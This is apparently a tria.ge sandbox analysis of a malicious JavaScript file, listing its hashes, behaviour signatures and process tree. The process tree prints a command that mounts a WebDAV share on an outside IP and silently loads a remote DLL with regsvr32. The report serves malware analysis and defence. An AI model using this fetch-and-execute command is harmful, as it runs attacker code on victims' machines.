Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
140s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23/07/2024, 04:17
Static task
static1
Behavioral task
behavioral1
Sample
1515017470155816161.js
Resource
win7-20240704-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
1515017470155816161.js
Resource
win10v2004-20240709-en
5 signatures
150 seconds
General
-
Target
1515017470155816161.js
-
Size
3KB
-
MD5
5ee22e06e654711125017138c2518211
-
SHA1
b9a1f07e9e240158d42e51b6bb5ce504ee9ac439
-
SHA256
8e414076b1d9948a433cd0e6b0f2f47bc2ad6edd35c9023d7b2816a9f9b78009
-
SHA512
c3b49a1f57f3778a34ebcddf58105d3c53e2af59c1f31ac897245f28732a9346b52b86dd9ba3e43afa0c0c71a7d81d96e5cbff6e3d731f20a16956674cc49a8c
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4876 wrote to memory of 2540 4876 wscript.exe 84 PID 4876 wrote to memory of 2540 4876 wscript.exe 84 PID 2540 wrote to memory of 640 2540 cmd.exe 86 PID 2540 wrote to memory of 640 2540 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1515017470155816161.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\246892003821035.dll2⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:640
-
-